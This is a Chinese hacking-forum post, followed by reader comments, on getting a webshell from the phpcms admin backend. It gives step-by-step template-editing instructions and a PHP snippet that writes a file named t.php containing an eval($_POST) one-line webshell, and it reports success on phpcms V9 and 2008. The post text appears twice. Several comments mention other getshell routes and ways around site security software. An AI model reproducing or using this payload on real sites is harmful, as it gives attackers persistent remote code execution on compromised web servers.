phpcms后台通杀拿shell
先是发到乌云了,结果是内容太简单 不给审核通过 罢了罢了 不发到那里了
利用办法是通过模板那里
界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改
在最下面{template "content","footer"}的上一行写入
<?php
$fp = @fopen("t.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
点击提交,生成首页 会在根目录下生成t.php
phpcmsV9 phpcms2008测试成功
本来想要发到脚本安全检测版块的,结果木钱进不去 只能发到这里了 求加钱
利用办法是通过模板那里
界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改
在最下面{template "content","footer"}的上一行写入
<?php
$fp = @fopen("t.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
点击提交,生成首页 会在根目录下生成t.php
phpcmsV9 phpcms2008测试成功
本来想要发到脚本安全检测版块的,结果木钱进不去 只能发到这里了 求加钱
关于作者
评论46次
不知道现在还能不能利用
get到了-.-
我会告诉你们 模板会 include 吗
phpcms 到了后台很少拿不到shell v9的首先是截包上传可以直接传马,不过具体得看服务器权限配置。完了全站静态化也有几处getshell之前90有人发过,不过最新版似乎补了
收藏了,以后可以用,多谢分享
刚好手上有phpcms 的后台 没成功
@President 后台很多文件包含的。都可以拿shell
求大牛指点.用此方法的时候提示含危险代码,保存不了,无论什么代码都保存不了,服务器上面有安全狗有360网站卫士.如其它方法
模板引擎了吧
后台好搞,关键是前台的公布的少
还是多多 回复的好 不然就被T了
好多站phpcms后台的模板都编辑不起 不知道有没有更好的方法
测试 已经补了
看到大家都在讨论为什么在html中执行了php代码 生成了shell 我就说下我的看法,像phpcms、dedecms、帝国、discuz这种开源的程序,仔细看代码其实无非就是 通过php路由包含模版文件并通过解析模版中的标签来展示路由到的页面。 phpcms中典型的loop、if else、eval、<?php ?>标签在discuz中也可以解析,只是为了样式和数据分离,同时也方便修改模版样式 个人感觉这些cms中的标签都可以用<?php ?>代替 只要你会写php就可以,标签是方便不会写php的模版制作人员用的。 也并不是html就不安全,要看是不是有模版解析器重新解析了html中的代码。 上述好像有点乱
感谢分享,收藏下
好像是以前的,后台还有代码执行
我是来看你头像的